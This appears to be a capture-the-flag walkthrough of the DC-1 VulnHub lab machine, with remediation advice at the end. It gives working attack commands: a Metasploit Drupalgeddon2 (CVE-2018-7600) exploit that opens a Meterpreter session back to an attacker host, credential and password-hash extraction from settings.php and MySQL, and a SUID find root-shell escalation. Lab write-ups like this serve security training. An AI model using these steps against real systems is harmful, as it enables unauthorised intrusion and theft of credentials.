A complete walkthrough of the DC-1 VulnHub machine — from host discovery to root. Covers Drupalgeddon2 exploitation, credential extraction, and SUID privilege escalation.
Ran netdiscover on the host-only interface to find the target on the local network.
netdiscover -i eth1Full-port OS-detection scan to map the attack surface.
nmap -p- -O 192.168.56.102Version scan on open ports revealed Apache 2.2.22, PHP 5.4, and a Drupal CMS fingerprint.
nmap -sV -p22,80,111 192.168.56.102Browsing to port 80 confirmed Drupal 7. Nikto surfaced exposed paths and misconfigurations.
nikto -h http://192.168.56.102Used the drupal_drupalgeddon2 module to gain a Meterpreter session as www-data.
use exploit/unix/webapp/drupal_drupalgeddon2
set RHOSTS 192.168.56.102
set LHOST 192.168.56.101
runFlag 1 hinted at the config file. Reading settings.php leaked database credentials.
cat sites/default/settings.phpConnected to the local MySQL instance and pulled user password hashes from drupaldb.
mysql -u dbuser -p
use drupaldb;
select * from users;Flag 4 hinted at the same escalation vector used for root. The find binary had the SUID bit set, allowing shell spawn as root.
find /dev -name null -exec /bin/sh \;cat /root/thefinalflag.txtCVE-2018-7600 — unauthenticated remote code execution on Drupal 7.x via form API.
settings.php readable by web process — plaintext DB credentials leaked to attacker.
find binary with SUID bit allows any user to spawn a privileged shell as root.
Upgrade to a supported Drupal version. Drupal 7 has been end-of-life since January 2025.
Set strict file permissions on settings.php (440 or 444). It should never be readable by the web process in a way that exposes credentials.
Run find / -perm -4000 regularly. Remove SUID from non-essential binaries like find, vim, and nmap.
The DB user should have only the minimum required permissions — no shell, no file read, no admin rights.